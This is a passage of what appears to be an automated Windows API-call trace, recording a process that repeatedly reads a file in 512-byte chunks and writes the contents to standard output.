lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.118] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.118] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] GetFileType (hFile=0x4c) returned 0x1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.120] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.120] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] GetFileType (hFile=0x4c) returned 0x1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] GetFileType (hFile=0x4c) returned 0x1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] GetFileType (hFile=0x4c) returned 0x1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] GetFileType (hFile=0x4c) returned 0x1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.121] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.121] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.123] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.123] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.124] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.124] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] GetFileType (hFile=0x4c) returned 0x1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] GetFileType (hFile=0x4c) returned 0x1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] GetFileType (hFile=0x4c) returned 0x1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.125] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.125] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.125] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.125] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] GetFileType (hFile=0x4c) returned 0x1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] GetFileType (hFile=0x4c) returned 0x1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.126] GetFileType (hFile=0x4c) returned 0x1 [0174.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.126] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.126] GetFileType (hFile=0x4c) returned 0x1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] GetFileType (hFile=0x4c) returned 0x1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] GetFileType (hFile=0x4c) returned 0x1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] GetFileType (hFile=0x4c) returned 0x1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] GetFileType (hFile=0x4c) returned 0x1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.127] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.127] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] GetFileType (hFile=0x4c) returned 0x1 [0174.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.128] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, 